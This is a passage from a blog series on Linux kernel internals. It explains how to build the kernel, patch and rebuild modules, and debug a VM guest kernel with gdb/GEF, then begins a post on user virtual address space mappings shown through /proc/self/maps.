Since then, Loadable Kernel Modules (LKMs) have improved the flexibility of the Linux kernel, allowing features to be implemented as modules which can either be built into the base kernel or built as separate, loadable modules.

These can be loaded into, and unloaded from, kernel memory on demand without requiring a reboot or having to rebuild the kernel. Nowadays LKMs are used for device drivers, filesystem drivers, network drivers etc.

Getting Setup

Alright, let’s get things setup shall we? In this section I’ll talk about how to get to a position where we’re able to make changes to a kernel module, rebuild it and install it.

There are probably a lot of different ways to do this - some quicker, some hackier and some context specific. While I’ll touch on some shortcuts in the next section, in my experience the easiest way to avoid a headache is just starting from a fresh kernel build.

So that’s what we’re going to do! Buckle up, let’s see if I can keep this brief. First I’ll quickly cover how to build the kernel and then move onto patching specific modules.

Building The Kernel

First things first, make sure you grab the necessary dependencies for building the kernel:

$ sudo apt-get install git fakeroot build-essential ncurses-dev xz-utils libssl-dev bc flex libelf-dev bison dwarves

With that sorted, download the kernel version you’re wanting to play with from kernel.org:

$ wget https://cdn.kernel.org/pub/linux/kernel/v5.x/linux-5.17.tar.xz

If you’re not sure what kernel version to go for, just pick the one closest to your current environment, which you can check via the cmd uname -r; don’t worry about patch versions or anything past the first two numbers, we ain’t got no time for that.
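If you'd rather not eyeball it, here's a small sketch that trims a uname -r style string down to its first two numbers and builds the matching download URL. The URL pattern is an assumption extrapolated from the single kernel.org link above, and tarball_url() is a hypothetical helper, so double check the result before reaching for wget.

```python
import re


def tarball_url(release: str) -> str:
    """Build a kernel.org tarball URL from a `uname -r` style release string."""
    match = re.match(r"(\d+)\.(\d+)", release)
    if match is None:
        raise ValueError(f"unexpected release string: {release!r}")
    major, minor = match.groups()
    # Assumed pattern: .../kernel/v<major>.x/linux-<major>.<minor>.tar.xz
    return (
        f"https://cdn.kernel.org/pub/linux/kernel/v{major}.x/"
        f"linux-{major}.{minor}.tar.xz"
    )


# Example release string; on a live box you could pass platform.release() instead.
print(tarball_url("5.17.0-051700-generic"))
```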

Next let’s extract the kernel source into our current dir and cd into it after:

$ tar -xf linux-5.17.tar.xz && cd linux-5.17

Now we need to configure our kernel. The kernel configuration is stored in a file named .config, in the root of the kernel source tree (aka where we just cd’d into).

On Debian-based distros you should be able to find your config at /boot/config-$(uname -r) or similar; on my Arch box it’s compressed at /proc/config.gz:

$ cp /boot/config-$(uname -r) .config

This file contains all the configuration options for your kernel; if you want to play around with these you can use make menuconfig to tweak your config. Speaking of tweaking your config, you may want to make some changes:

On Ubuntu, you’ll likely encounter some key related issues if you try to build using their config, so set the following config values in your .config: CONFIG_SYSTEM_TRUSTED_KEYS="", CONFIG_SYSTEM_REVOCATION_KEYS=""
Given there may be patching and debugging involved down the line, it might be worth taking the opportunity to enable debugging symbols with [CONFIG_DEBUG_INFO](https://cateee.net/lkddb/web-lkddb/DEBUG_INFO.html)=y && [CONFIG_GDB_SCRIPTS](https://cateee.net/lkddb/web-lkddb/GDB_SCRIPTS.html)=y; you can enable these easily by using the helper ./scripts/config -e DEBUG_INFO -e GDB_SCRIPTS

With .config ready, let’s crack on. By using oldconfig instead of menuconfig we can avoid the ncurses interface and just update the kernel configuration using our .config (it just means we may get some prompts during the make process for new options):

$ make oldconfig

Now we’re ready to start building the kernel, and depending on your system and the .config we’ve copied over, this can take a while, so fire all CPU cores:

$ make -j$(nproc)

Next up, we can start installing our freshly built kernel. First up are the modules, which will typically be installed to /lib/modules/. So, to install our modules we’ll go ahead and run:

$ sudo make modules_install

Finally we’ll install the kernel itself; the following command will do all the housekeeping required to let us select the new kernel from our bootloader:

$ sudo make install

And voila! Just like that we’ve built our Linux kernel from source, nabbing the config from our current environment, and we’re ready to do some tinkering!

Module Patching

Okay, now we have a clean environment to work with and can start tinkering! Because we’ve built the kernel from source, we know we’re building our patched modules in the exact same development environment as the kernel we’re installing them into.

While the initial build can be lengthy, it’s straightforward and we avoid the headache of out-of-tree module taints, signing issues and other finicky version-mismatch related issues.

Instead, we can make whatever changes we intend to make to our module and then run much the same commands we did during the initial install, only targeting our patched module(s). For example, for CVE-2022-0435 I tested a patch in net/tipc/monitor.c, so to rebuild and install my patched module I’d simply run:

$ make M=net/tipc
$ sudo make M=net/tipc modules_install

I’m then able to go ahead and re/load tipc and we’re good to go! Easy as that.

Shortcuts & Alternatives

As some of you may already be painfully aware, building a full-featured kernel can actually take some time, especially in a VM with limited resources.

Minimal Configs

So to speed things up dramatically, if you’re familiar with the module(s) you’re going to be looking at, a more efficient approach is to start from a minimal config and enable the bare minimum features required for your testing environment.

For example $ make defconfig will generate a minimal default config for your arch, and then you can use $ make menuconfig to make further adjustments.

Skip Building Altogether

Depending on your requirements, you can just avoid building altogether:

if you just want to do some debugging, you could pull debug symbols from your distribution repo (see section on symbols below)
you may be able to fetch source from your distro repos, where you can then patch and build modules from there
if you don’t need to worry about module signing/taint, and you’re happy to get messy, there’s hackier ways to do all this too

Getting Stuck In

Now that we’ve got our kernel dev environment setup, it’s time to get stuck in! I’ll briefly touch on generating patches, because why not, and instrumentation (though I’m not as familiar with this topic) before finally covering how we can debug kernel modules.

Patch Diffs

Disclaimer, if you want to submit any patches to the kernel formally, then definitely check out this comprehensive kernel doc on the various dos & donts of submitting patches.

That said, we’re just playing around here! Plus I don’t think it actually mentions the command in that particular doc. Anyway, I digress, we can run the following commands to generate a simple patch diff between two files:

$ diff -u monitor.c monitor_patched.c 
--- monitor.c   2021-03-11 13:19:18.000000000 +0000
+++ monitor_patched.c 2022-04-06 19:25:27.449661568 +0100
@@ -503,8 +503,10 @@
        /* Cache current domain record for later use */
        dom_bef.member_cnt = 0;
        dom = peer->domain;
-       if (dom)
+       if (dom) {
+               printk("printk debugging ftw!\n");
                memcpy(&dom_bef, dom, dom->len);
+       }
 
        /* Transform and store received domain record */
        if (!dom || (dom->len < new_dlen)) {

Where -u tells diff to use the unified format, which provides us with 3 lines of unified context (this is the default, but N lines of context can be specified with -U N).

This unified format provides a line-by-line comparison of the given files, letting us know what’s changed from one to another:

Line 2 is part of the patch header, prefixed with ---, and tells us the original file, along with its last modification time and timezone offset from UTC (thanks @kfazz01!)
Line 3 is also part of the header, prefixed with +++, and tells us the new file, along with its last modification time and timezone offset from UTC (thanks @kfazz01!)
Line 4, encapsulated by @@, defines the start of a “hunk” (group) of changes in our diff; sticking to - for original and + for new, -503,8 tells us this hunk starts from line 503 in monitor.c and shows 8 lines. +503,10 means the hunk also starts from line 503 in monitor_patched.c but shows 10 lines (which checks out as we removed 1 and added 3).
Lines 5-7 & 13-15 are our 3 lines of unified context, just to give us some idea of what’s going on around the lines we’ve changed
Lines 8-12 then are, by process of elimination, where our changes live. Changing things up, now - prefixes lines we’ve removed (i.e. in monitor.c but no longer in monitor_patched.c) and + prefixes lines we’ve added to monitor_patched.c; line 11, the memcpy(), has neither prefix as it’s unchanged and just happens to sit between our changes
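If you want to sanity check a hunk header against its body, the breakdown above can be sketched in a few lines. This is just an illustration of the unified format's bookkeeping, not how diff or patch implement it; parse_hunk_header() and count_hunk_lines() are hypothetical helpers and the body is a trimmed copy of the hunk above.

```python
import re

# Matches e.g. "@@ -503,8 +503,10 @@"; an omitted ",N" means a length of 1.
HUNK_RE = re.compile(r"^@@ -(\d+)(?:,(\d+))? \+(\d+)(?:,(\d+))? @@")


def parse_hunk_header(line):
    """Return (old_start, old_len, new_start, new_len) from a hunk header."""
    match = HUNK_RE.match(line)
    if match is None:
        raise ValueError(f"not a hunk header: {line!r}")
    old_start, old_len, new_start, new_len = match.groups()
    return int(old_start), int(old_len or 1), int(new_start), int(new_len or 1)


def count_hunk_lines(body):
    """Count the lines a hunk body shows for the old and new file."""
    context = sum(1 for line in body if line.startswith(" "))
    removed = sum(1 for line in body if line.startswith("-"))
    added = sum(1 for line in body if line.startswith("+"))
    return context + removed, context + added


body = [
    " /* Cache current domain record for later use */",
    " dom_bef.member_cnt = 0;",
    " dom = peer->domain;",
    "-if (dom)",
    "+if (dom) {",
    "+printk(...);",
    " memcpy(&dom_bef, dom, dom->len);",
    "+}",
    " ",
    " /* Transform and store received domain record */",
    " if (!dom || (dom->len < new_dlen)) {",
]

print(parse_hunk_header("@@ -503,8 +503,10 @@"))
print(count_hunk_lines(body))
```

Context lines count towards both files, which is why 7 context lines plus 1 removal gives 8, and 7 context lines plus 3 additions gives 10.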

So there’s a quick ramble on patch diffs. It’s as easy as that. We can also do diffs on entire directories/globs of files:

$ diff -Naur net/tipc/ net/tipc_patched/

Where -N treats missing files as empty, -a treats all files as text, -r recursively compares subdirs and -u is the same as before.

If we want to save these patches and apply them down the line, we can redirect the output into a file and then apply it to the original:

$ diff -u monitor.c monitor_patched.c > monitor.patch
$ patch -p0 < monitor.patch 
patching file monitor.c

When we pass patch a patch file, it expects an argument -pX where X defines how many directory levels to strip from the paths in our patch header. Ours was --- monitor.c, so we include -p0 as there’s 0 dir levels to strip!
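To get a feel for what -pX does to the paths in a patch header, here's a minimal sketch. strip_components() is a hypothetical helper that mimics the idea (drop the first X slash-separated components); it glosses over edge cases the real patch handles, such as runs of adjacent slashes.

```python
def strip_components(path: str, levels: int) -> str:
    """Drop the first `levels` slash-separated components from `path`."""
    parts = path.split("/")
    if levels >= len(parts):
        raise ValueError(f"cannot strip {levels} levels from {path!r}")
    return "/".join(parts[levels:])


# Our header path has no directories, so -p0 leaves it untouched.
print(strip_components("monitor.c", 0))
# A header like "a/net/tipc/monitor.c" would want -p1 to drop the leading "a/".
print(strip_components("a/net/tipc/monitor.c", 1))
```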

Instrumentation

Memes aside, printf() does the job in your own C projects, printk() is just the kernel-land equivalent[1] and sometimes a cheeky printk("here") is all you need.

Using the patching approach we mentioned above, sometimes the easiest way to debug or trace execution isn’t to set up some complicated framework but simply to sprinkle in some printk()’s, rebuild your module and voila!

And well, that’s the extent of my practical kernel instrumentation knowledge. But I’d feel bad making a whole section just to meme printk(), so while I can’t expand on them fully, here are a couple of other avenues for kernel instrumentation:

kprobes

kprobes enable you to dynamically break into any kernel routine and collect debugging and performance information non-disruptively. You can trap at almost any kernel code address, specifying a handler routine to be invoked when the breakpoint is hit — kernel.org/doc

kprobes provide a fairly comprehensive API for your instrumentation needs, however the flip side is that it does require some light kernel development skills (perhaps a good intro task to kernel development??) to get stuck in.

ftrace

ftrace, or function tracer, is “an internal tracer designed to help out developers and designers of systems to find what is going on inside the kernel […] although ftrace is typically considered the function tracer, it is really a frame work of several assorted tracing utilities.” [2].

ftrace is actually quite interesting, as unlike similarly named (but not to be confused) tools like strace, there is no usermode binary to interact with the kernel component. Instead, users interact with the tracefs file system.

For the sake of brevity, if you’re interested in checking out ftrace, here is an introductory guide by Gaurav Kamathe on opensource.com:

Analyze the Linux kernel with ftrace

eBPF??

Okay, this might be a bit of a rogue one. Quick disclaimer being I’ve unfortunately not found the time, despite it being high up on my list, to properly play with eBPF. So take any statements RE eBPF features with a pinch of salt!

That said, to summarise (I think I got this bit right), eBPF is a kernel feature introduced in the 3.x series (the bpf() syscall landed in 3.18) that allows privileged usermode applications to run sandboxed code in the kernel.

I’m particularly interested in seeing the limits of its application, particularly in spaces such as detection, rootkits and debugging; not bad for something originally focused around networking.

Although, RE instrumentation & debugging, I’m not sure how much extra mileage eBPF would be able to provide. The eBPF bytecode runs in a sandboxed environment within the kernel, and as far as I’m aware can’t alter kernel data.

That said, from an instrumentation perspective we can still do some interesting tracing. For example, we can attach to one of our kprobes and read function args & ret values.

Anyway, perhaps just some food-for-thought, but I’ll stop rambling! I’ll drop a couple of links below to existing publications on eBPF instrumentation/debugging [3].

The reason it’s printk(), and not the classic printf() we usually find in C, is that the C standard library isn’t available in kernel mode; so the k in printk() lets us know we’re using the kernel-land implementation.
https://www.kernel.org/doc/Documentation/trace/ftrace.txt
Debugging Linux issues with eBPF (USENIX LISA18)
Kernel analysis using eBPF

Debugging

Working with something as complex as the Linux kernel, you’ll inevitably find yourself resonating with the above gif, and that’s alright! That said, getting a smooth debugging workflow set up can go a long way to alleviating the confusion.

Setting up a good debugging environment means you can set breakpoints, allowing you to pause kernel execution at moments of interest, as well as inspect, and even change, registers and memory! There’s also scope for scripting various elements of this process too.

GDB Debugging Stub

Remember about 2000 words ago I mentioned the only real assumption I was going to make is that you’re doing your kernel testing/shenanigans in a VM?

It turns out that trying to debug the kernel you’re running is… tricky. So besides snapshots and various other QoL features, a big pro to using VMs is the ability to remotely debug them at the kernel-level from our host (or another guest) using a debugger[1].

The debugger in question, gdb, or the GNU Project debugger[1], is a portable debugger that runs on many UNIX-like systems and is basically the de facto Linux kernel debugger (@ me).

Thanks to gdbstubs[2], sets of files included by the virtualisation software (VMWare, QEMU etc.) in guests, we’re able to remotely debug our guest kernel with much the same functionality we’d expect from userland debugging: breakpoints, viewing/setting registers and memory etc. etc.[3]

I’ll use this opportunity to plug GEF (GDB Enhanced Features) cos let’s not forget gdb is like 36 years old and your boy needs some colours up in his CLI. Beyond just colours, gef has a great suite of quality-of-life features that just make the debugging workflow easier.

❗

Note that future GDB snippets will be using GEF, definitely not in an attempt to convert you, so don’t be scared by the `gef➤` prompt; it’s all the same program.

Anyway, enough rambling, let’s take a look at getting kernel debugging setup on our VM:

Enable the gdbstub on your guest[4]; typically this will listen on an interface:port you specify on the host. E.g. QEMU by default listens on localhost:1234.
Now on your host, or another guest that can reach the listening interface on your host, you can spin up gdb[5] and connect:

$ gdb
...
gef➤ target remote :1234 
gef➤ # you can omit localhost, so just :1234 works too

And just like that, you’re now remotely debugging the Linux kernel - awesome, right? Except if you’ve just fired up gdb and connected like the snippet above, you’re probably seeing something like this:

gef➤  target remote :12345
Remote debugging using :12345
warning: No executable has been specified and target does not support
determining executable automatically.  Try using the "file" command.
0xffffffffa703f9fe in ?? ()
[ Legend: Modified register | Code | Heap | Stack | String ]
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
[!] Command 'context' failed to execute properly, reason: 'NoneType' object has no attribute 'all_registers'
gef➤  info reg
...
rip            0xffffffffa703f9fe  0xffffffffa703f9fe

Huh, so we’ve connected and it looks like we’ve trapped execution at 0xffffffffa703f9fe, but gdb has no idea where we are… This does not bode well for a productive debugging session; so let’s look at how to fix that!

vmlinux, symbols & kaslr

So although our gdb has managed to make contact with the gdbstub on our guest, it’s far from omnipotent. It can interact with memory and read the registers, as it understands the architecture, however it doesn’t know about the kernel’s functions and data structures.

Unfortunately for us that’s the whole reason we’re doing kernel debugging, to debug the kernel! Luckily though, it’s fairly simple to tell gdb everything it needs to know.

If you’ve read my Linternals: The (Modern) Boot Process [0x02], you’ll know that there’s a file called vmlinux containing the decompressed kernel image as a statically linked ELF. Just like debugging a userland binary, we can load this vmlinux into gdb and it’s able to interpret it without any dramas.

Importantly, though, just like userland debugging we want to make sure we load a vmlinux with debugging symbols included, there’s a couple options for this:

If you’re building from source, just include CONFIG_DEBUG_INFO=y and optionally CONFIG_GDB_SCRIPTS=y and you’ll find your vmlinux with debug symbols in your build root (see compiling/README.md for more info on building)
- ./scripts/config -e DEBUG_INFO -e GDB_SCRIPTS will enable these in your config with minimal fiddling
If you’re running a distro kernel, you can check your distro’s repositories to see if you can pull debug symbols
- On Ubuntu, if you update your sources and keyring [1], you can pull the debug symbols by running $ sudo apt-get install linux-image-$(uname -r)-dbgsym and should find your vmlinux @ /usr/lib/debug/boot/vmlinux-$(uname -r)

And just like that, we’re done! jk, there’s one more common gotcha (that I always forget) and that’s KASLR: Kernel Address Space Layout Randomization. As it sounds, this randomizes where the kernel image is loaded into memory at boot time; so the address gdb reads from the vmlinux will naturally be wrong…

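You can either add nokaslr to your boot options for a single boot, typically by editing the entry in the grub menu at boot
Or make it persistent by editing /etc/default/grub, including nokaslr in GRUB_CMDLINE_LINUX_DEFAULT and regenerating the grub config (e.g. sudo update-grub on Debian-based distros)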

After that we really are ready, and can repeat the steps from before, remembering to also load our vmlinux with gdb:

$ gdb vmlinux
...
gef➤  target remote :12345 
... 
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, stopped 0xffffffff81c3f9fe in native_safe_halt (), reason: SIGTRAP
[#1] Id 2, stopped 0xffffffff81c3f9fe in native_safe_halt (), reason: SIGTRAP
[#2] Id 3, stopped 0xffffffff81c3f9fe in native_safe_halt (), reason: SIGTRAP
[#3] Id 4, stopped 0xffffffff81c3f9fe in native_safe_halt (), reason: SIGTRAP
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0xffffffff81c3f9fe → native_safe_halt()
[#1] 0xffffffff81c3fc4d → arch_safe_halt()
[#2] 0xffffffff81c3fc4d → acpi_safe_halt()
[#3] 0xffffffff81c3fc4d → acpi_idle_do_entry(cx=0xffff88810187d864)
[#4] 0xffffffff816e4201 → acpi_idle_enter(dev=, drv=, index=)
[#5] 0xffffffff8198e56d → cpuidle_enter_state(dev=0xffff888105a61c00, drv=0xffffffff8305dfa0 , index=0x1)
[#6] 0xffffffff8198e88e → cpuidle_enter(drv=0xffffffff8305dfa0 , dev=0xffff888105a61c00, index=0x1)
[#7] 0xffffffff810e7fa2 → call_cpuidle(next_state=0x1, dev=0xffff888105a61c00, drv=0xffffffff8305dfa0 )
[#8] 0xffffffff810e7fa2 → cpuidle_idle_call()
[#9] 0xffffffff810e80c3 → do_idle()
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
gef➤

Awesome! Now gdb knows exactly where we are, and gef provides us lots of useful information in its ctx menu, which you can always pop up with the ctx command.

I’ve cut it off for brevity but we can at a glance see sections (might need to scroll right for the headings) for registers, stack, code, threads and trace!

On top of that, as I’ll touch on in Misc GDB Tips below, we’re able to explore all the kernel structures and more thanks to the symbols we now have.

Loadable Modules

As a quick aside, you might find out that some symbols for certain modules are missing, despite doing all that vmlinux faff above. This is because not all modules are compiled into the kernel, some are compiled as loadable modules.

This means that the modules are only loaded into memory when they’re needed, e.g. via modprobe. We can check whether a module is built-in or loadable in our .config:

CONFIG_YOUR_MODULE=y defines an in-kernel module
CONFIG_YOUR_MODULE=m defines a loadable kernel module
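As a quick sketch, checking this programmatically is just a case of finding the option's line in your .config. build_type() is a hypothetical helper and the sample config is made up for illustration; on a real box you'd read the text from your .config (or /boot/config-$(uname -r)).

```python
def build_type(config_text: str, option: str) -> str:
    """Report how `option` is built according to the given .config contents."""
    for line in config_text.splitlines():
        line = line.strip()
        # The trailing "=" stops CONFIG_FOO matching CONFIG_FOO_BAR.
        if line.startswith(option + "="):
            value = line.split("=", 1)[1]
            if value == "y":
                return "built-in"
            if value == "m":
                return "loadable"
            return value
    # Disabled options appear as "# CONFIG_FOO is not set" or not at all.
    return "not set"


sample_config = """\
CONFIG_NET=y
CONFIG_TIPC=m
# CONFIG_KASAN is not set
"""

for opt in ("CONFIG_NET", "CONFIG_TIPC", "CONFIG_KASAN"):
    print(opt, "->", build_type(sample_config, opt))
```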

For loadable modules, we need to do a couple of extra steps, in addition to those above, in order to let gdb know about these symbols:

Copy the module’s your_module.ko from your debugging target; try /lib/modules/$(uname -r)/kernel/
On your debugging target, find out the base address of the module; try sudo grep -e "^your_module" /proc/modules
In your gdb session, you can now load in the module by (gdb) add-symbol-file your_module.ko 0xAddressFromProc - voila!

Sorted! Now the symbols from your_module should be available in gdb! Just remember that even with KASLR disabled, this address can be different each time you load the module, but you only need to grab the your_module.ko once at least.
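Since the address changes between loads, it can be handy to script the lookup. Here's a minimal sketch that pulls the base address out of /proc/modules style text and formats the gdb command for you. The helper names and the sample line (including its address) are made up for illustration; note that without root the address column typically reads as zeroes, hence the sudo above.

```python
def module_base(proc_modules_text: str, name: str):
    """Return the load address of module `name`, or None if it isn't listed."""
    for line in proc_modules_text.splitlines():
        # Fields: name, size, refcount, dependencies, state, address[, taint]
        fields = line.split()
        if len(fields) >= 6 and fields[0] == name:
            return int(fields[5], 16)
    return None


def add_symbol_file_cmd(ko_path: str, base: int) -> str:
    """Format the gdb command that loads the module's symbols at `base`."""
    return f"add-symbol-file {ko_path} {base:#x}"


# Hypothetical /proc/modules line for illustration.
sample = "tipc 339968 0 - Live 0xffffffffc0a5b000\n"

base = module_base(sample, "tipc")
print(add_symbol_file_cmd("tipc.ko", base))
```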

Misc GDB Tips

Oof, well this post is already careening towards 4000 words (and I did this voluntarily, for fun?!), so I think I’ll just link to my repository where you can find some useful gdb/gef commands for debugging the Linux kernel!

linux-kernel-resources/debugging at main · sam4k/linux-kernel-resources

Other Stuff

As we’re transitioning into a speedrun, congratulations to anyone who read the whole thing, I’ll attempt to quickly touch on some other useful debugging resources:

drgn: remember earlier, when I said debugging the kernel you’re using can be tricky? Well drgn is an extremely programmable debugger, written in python (and not 36 years ago), that among other things allows you to do live introspection on your kernel. I still need to explore this more, and I wouldn’t see it as a replacement for gdb, for example, but as a different tool for different goals.
strace: ah yes, our old friend, strace(1). The system call tracing utility can be useful for complementing your kernel debugging by tracing the interactions between your poc/userland interface/program and the kernel. With minimal faff you can home in on what kernel functions you may want to focus your debugging endeavours on.
procfs: another reminder about the various introspection available via /proc/; you saw earlier that we made use of /proc/modules. There’s plenty to explore here.
man pages: don’t sleep on the man pages! Although there aren’t generally pages on kernel internals, the syscall section (2) can help with understanding some of the interactions that go on
source: due to word count concerns, oops, and the fact I never really use it, I haven’t included adding source into gdb but that doesn’t mean you can’t have it up for reference! I always try to have a copy of source handy to explore, not to mention the documentation that’s usually available somewhere in the kernel too

https://www.sourceware.org/gdb/
https://sourceware.org/gdb/onlinedocs/gdb/Remote-Stub.html
Future post idea? Dive into some debugging internals
https://github.com/sam4k/linux-kernel-resources/tree/main/debugging#gdb--vm
If your guest is a different architecture to your host, gdb needs to know about it, so you’ll need to install and use gdb-multiarch

FAQ

So this is a little bit of an experiment, and maybe more suited to the GitHub repo, but if anyone has any questions feel free to @ me on Twitter and I’ll try to keep this FAQ updated. Also, if anyone has any suggestions for FAQs, I’m happy to add those too :)

Postamble

Talk about feature creep, eh? We certainly covered a lot of ground in this post: from building the kernel to patching modules to setting up our debugging environment.

Hopefully some of this (or all!) has been useful, and maybe helped demystify things. As I briefly mentioned in the intro, I’ve included all the essentials in a github repository, which I’ll continue to update with any useful Linux kernel resources/demos/shenanigans.

GitHub - sam4k/linux-kernel-resources: Curated collection of resources, examples and scripts for Linux kernel devs, researchers and hobbyists.

I think by nature of the work we do, as programmers and “hackers”, a lot of times we find ourselves creating hacky solutions and shortcuts, then through some twisted process of natural selection some of these make their way into our workflow.

Though, perhaps because we consider them too niche or too messy, we often don’t share these solutions or quick tricks and so the cycle continues. Is this necessarily a bad thing? Of course not! I love to tinker and believe me, I have many a bash script that should never see the light of day, but perhaps there’s also a few that would help others if they did.

So really, this post is just a culmination of my own hacky, messy natural selection that has occurred during my time working on kernel stuff, so don’t @ me if it’s horribly wrong (DM me instead, pls help me), but hopefully there’s some takeaways here that will inspire others to tinker and perhaps save some time in the process.

Obligatory @ me for any suggestions, corrections or questions!

exit(0);

Linternals: The User Virtual Address Space

sam4k — Sun, 20 Mar 2022 19:00:00 +0000

Ready to dive back into some Linternals? I hope so! So to recap, last time, we covered some virtual memory fundamentals including:

Virtual vs physical memory
The virtual address space
The VM split (user and kernel virtual address spaces)

This time we’re going to zoom in and focus on the two parts of the virtual memory split, taking a look at the user and kernel virtual address spaces.

Hopefully, after that, we’ll have a good idea of how - and why - our Linux system uses virtual memory. At which point we’ll take a look at how this is all implemented behind the scenes, examining some kernel and hardware specifics!

0x04 User Virtual Address Space
- Userspace Mappings
- The Setup
  - brk()
  - mmap()
  - mprotect()
  - execve()
- Threads
- ASLR
- Wrapping Up In UVAS
Next Time!

0x04 User Virtual Address Space

Alrighty then, first things first, let’s actually take a look at what a typical process actually uses the user virtual address space (UVAS) for. Luckily, I don’t have to whip up a diagram for this, as we can use the /proc filesystem!

❓

procfs is a virtual filesystem that is created at boot. It acts as an interface to internal data structures in the kernel. It can be used to obtain information about the system and to change certain kernel parameters at runtime (sysctl). [1]

Inside procfs, you can inspect running processes by PID. For example, the file /proc/854/maps will contain information about the mappings for process with PID 854.

To make life easier, there’s a handy link, /proc/self/, which will point to the process currently reading the file - pretty neat! Beyond maps, there’s all sorts of information we can learn from procfs; check man procfs for more info.

https://www.kernel.org/doc/html/latest/filesystems/proc.html

Userspace Mappings

Back on topic! Let’s use the procfs to take a closer look at what our UVAS is being used for. From the man page, we learn the maps procfs file contains “the currently mapped memory regions and their access permissions” for a process.

We’ll touch more on the implementation later, but for now it’s worth remembering that the virtual address space is vast and largely empty. If a process needs to use some memory, either to load the contents of a file or to store data, it will ask the kernel to map that memory appropriately. Now that virtual address is actually pointing to something.

Using the self link we talked about earlier, and the maps file, we can use cat to output the details of its own memory mappings:

$ cat /proc/self/maps 
5577277d1000-5577277d3000 r--p 00000000 00:19 868257                     /usr/bin/cat
5577277d3000-5577277d8000 r-xp 00002000 00:19 868257                     /usr/bin/cat
5577277d8000-5577277db000 r--p 00007000 00:19 868257                     /usr/bin/cat
5577277db000-5577277dc000 r--p 00009000 00:19 868257                     /usr/bin/cat
5577277dc000-5577277dd000 rw-p 0000a000 00:19 868257                     /usr/bin/cat
557728bca000-557728beb000 rw-p 00000000 00:00 0                          [heap]
7fc863779000-7fc863a63000 r--p 00000000 00:19 2289972                    /usr/lib/locale/locale-archive
7fc863a63000-7fc863a66000 rw-p 00000000 00:00 0 
7fc863a66000-7fc863a92000 r--p 00000000 00:19 2289282                    /usr/lib/libc.so.6
7fc863a92000-7fc863c08000 r-xp 0002c000 00:19 2289282                    /usr/lib/libc.so.6
7fc863c08000-7fc863c5c000 r--p 001a2000 00:19 2289282                    /usr/lib/libc.so.6
7fc863c5c000-7fc863c5d000 ---p 001f6000 00:19 2289282                    /usr/lib/libc.so.6
7fc863c5d000-7fc863c60000 r--p 001f6000 00:19 2289282                    /usr/lib/libc.so.6
7fc863c60000-7fc863c63000 rw-p 001f9000 00:19 2289282                    /usr/lib/libc.so.6
7fc863c63000-7fc863c72000 rw-p 00000000 00:00 0 
7fc863c7e000-7fc863ca0000 rw-p 00000000 00:00 0 
7fc863ca0000-7fc863ca2000 r--p 00000000 00:19 2289273                    /usr/lib/ld-linux-x86-64.so.2
7fc863ca2000-7fc863cc9000 r-xp 00002000 00:19 2289273                    /usr/lib/ld-linux-x86-64.so.2
7fc863cc9000-7fc863cd4000 r--p 00029000 00:19 2289273                    /usr/lib/ld-linux-x86-64.so.2
7fc863cd5000-7fc863cd7000 r--p 00034000 00:19 2289273                    /usr/lib/ld-linux-x86-64.so.2
7fc863cd7000-7fc863cd9000 rw-p 00036000 00:19 2289273                    /usr/lib/ld-linux-x86-64.so.2
7ffddc9a0000-7ffddc9c1000 rw-p 00000000 00:00 0                          [stack]
7ffddc9f4000-7ffddc9f8000 r--p 00000000 00:00 0                          [vvar]
7ffddc9f8000-7ffddc9fa000 r-xp 00000000 00:00 0                          [vdso]
ffffffffff600000-ffffffffff601000 --xp 00000000 00:00 0                  [vsyscall]

Sweet! Well, there’s a lot to unpack here, though some of it should look familiar. Consulting man procfs we can see the columns are as follows:

(virtual) address, perms, offset, dev, inode, pathname

If we recall from last time, on a typical x86_64 setup like mine, the most significant 16 bits (MSB 16) are all 0 for userspace virtual addresses and all 1 for kernel virtual addresses.

This means we can normally spot kernel addresses at a glance, as they begin 0xffff... while userspace addresses begin with 0x0000... and, with the leading zeros dropped, typically print shorter.

Anyway, before we scroll too far away from the code block (oops), let’s unpack some of these lines of output shall we?

Lines 2-6: here we can see the mappings for the binary being run, found at /usr/bin/cat. Why are there multiple mappings for one binary file? Typically programs are made up of multiple sections, with differing perms. The .text section where the code is? We’ll want that readable & executable. Some portions of data, like our static consts want to be read only (.rodata), while mutable data wants to be readable and writable (.data) [1]
Line 7: procfs uses the pseudo-path [heap] to describe the mapping for the heap (no surprise there); a dynamic memory pool
Lines 8,10-15: next up we can see several shared libraries being mapped into memory, for the program to use. We can see locale information and libc; again these may be split up into multiple mappings as touched on a moment ago [2]
Lines 9,16,17: these weird mappings with no pathname are called anonymous mappings and are not backed by any file. This is essentially a blank memory region that a userspace process can use at its discretion. Examples of anonymous mappings include both the stack and the heap [3]
Lines 18-22: ld.so is the dynamic linker that is invoked anytime we run a dynamically linked program (a quick check of file /usr/bin/cat will confirm this is indeed a dynamically linked program!)
Line 23: another pseudo-path, [stack] is the mapping for our process’s stack space
Line 25: The “virtual dynamic shared object” (or vDSO) is a small shared library exported by the kernel to accelerate the execution of certain system calls that do not necessarily have to run in kernel space [5]
Line 24: The vvar is a special page mapped into memory in order to store a “mirror” of kernel variables required by the virtual syscalls exported by the kernel
Line 26: The vsyscall mapping is a legacy one; it originally provided an executable mapping of kernel code for specific syscalls that didn’t require elevated privileges, and hence didn’t need the whole user -> kernel mode context switch. It’s effectively defunct now: calls into the vsyscall table still work for compatibility, but they trap and are handled like a normal syscall [6]

And just like that we’ve pieced together the various userspace (and some kernel stuff) mappings for an everyday program like cat! Pretty neat. In addition we’ve dived into some of the tools the kernel provides us to examine this information.
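If you want to poke at this output programmatically, here’s a minimal sketch of splitting a single maps line into the six columns listed earlier. The Mapping tuple and the parse_maps_line() helper are names I’ve made up for illustration; the sample line is taken from the cat output above.

```python
from typing import NamedTuple


class Mapping(NamedTuple):
    """One line of /proc/<pid>/maps (hypothetical helper type)."""
    start: int
    end: int
    perms: str
    offset: int
    dev: str
    inode: int
    pathname: str


def parse_maps_line(line: str) -> Mapping:
    # The first five columns are whitespace separated. The pathname is
    # optional and may contain spaces, so split at most five times.
    fields = line.split(None, 5)
    addr_range, perms, offset, dev, inode = fields[:5]
    pathname = fields[5].strip() if len(fields) > 5 else ""
    start, end = (int(part, 16) for part in addr_range.split("-"))
    return Mapping(start, end, perms, int(offset, 16), dev, int(inode), pathname)


sample = "5577277d3000-5577277d8000 r-xp 00002000 00:19 868257                     /usr/bin/cat"
text_mapping = parse_maps_line(sample)
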